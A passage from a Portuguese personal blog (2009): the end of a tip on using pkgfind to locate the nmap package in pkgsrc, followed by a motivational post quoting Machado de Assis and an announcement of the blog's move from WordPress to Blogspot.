Perceba que ele deu um caminho relativo (não temos o caminho completo desde a raíz). Esse caminho está levando em consideração o local onde você colocou o pkgsrc, que em nosso caso é “/usr/pkgsrc“. Sendo assim, o caminho para o nmap que queremos instalar seria “/usr/pkgsrc/net/nmap“. Bastante útil o pkgfind não é?! Agora você pode encotrar qualquer programa e instalá-lo.

Lição do dia

2009-06-11T13:01:00.001-03:00

Devo agradecer a um amigo (invoid) por ter me mostrado esse vídeo, ele melhorou a minha visão de alguns pontos específicos na minha vida. Se eu podesse escolher as palavras exatas a serem usadas no dia da minha formatura, seriam essas:

PARTE1

 PARTE 2

"A arte de viver consiste em tirar do maior mau o maior bem" - Machado de Assis

Bom dia a todos,

Migrandooo

2009-06-11T12:11:00.000-03:00

Pessoal,
Estou migrando o meu antigo blog (http://insetoverde.wordpress.com) para este, pois no wordpress não é possível fazer muita coisa. É, não deu pra continuar no wordpress não. O lance por lá é muito engessado!!!

E meu querido calo (Raul Libório) me mostrou que aqui no blogspot é possível fazer o que eu estava procurando. Por isso...

HERE WE ARE!